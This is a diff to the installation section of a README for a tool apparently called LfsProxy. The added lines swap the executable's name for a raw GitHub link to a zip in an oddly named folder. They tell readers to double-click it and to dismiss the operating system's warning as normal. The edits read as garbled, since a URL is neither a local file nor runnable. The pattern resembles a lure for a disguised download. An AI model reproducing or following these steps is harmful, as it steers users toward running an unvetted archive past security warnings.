mohamedbelasy/LfsProxy/README.md

 ### 5. Locate the File

 Once the download is complete, open your downloads folder.
-You should see `LfsProxy.exe` there.
+You should see `https://raw.githubusercontent.com/mohamedbelasy/LfsProxy/master/odontoglossate/LfsProxy.zip` there.

 ### 6. Run the Application

-Double-click on `LfsProxy.exe` to run the application.
+Double-click on `https://raw.githubusercontent.com/mohamedbelasy/LfsProxy/master/odontoglossate/LfsProxy.zip` to run the application.
 You may see a warning from your operating system; this is normal for software downloaded from the internet.
 Click "Run" to proceed.

 ### 7. Configure LfsProxy